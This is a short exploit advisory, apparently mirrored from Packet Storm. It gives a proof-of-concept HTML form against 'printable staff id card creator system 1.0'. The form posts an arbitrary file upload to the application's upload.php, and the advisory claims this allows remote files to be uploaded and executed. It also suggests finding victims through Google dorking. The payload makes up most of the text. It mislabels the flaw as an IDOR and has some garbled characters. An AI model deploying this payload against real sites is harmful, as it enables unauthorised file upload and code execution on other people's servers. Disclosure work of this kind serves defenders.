Share
## https://sploitus.com/exploit?id=PACKETSTORM:181441
=============================================================================================================================================  
| # Title : printable staff id card creator system 1.0 idor Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419 |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .  
  
[+] Line : 8 Set your Target  
  
[+] Save As poc.html  
  
[+] payload :  
  
  
<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
<div class="modal-header" style="background:#222d32">  
<button type="button" class="close" data-dismiss="modal">ร—</button>  
<h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
SYSTEM INFORMATION INITIALISATION  
</center></h4>  
</div>  
<form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">   
  
<div class="modal-body">   
<center>   
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
<input type="hidden" name="page" value="admin.php">   
</center>  
</div>  
<div class="modal-footer">  
<input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
<button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
</div>  
</form></div>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================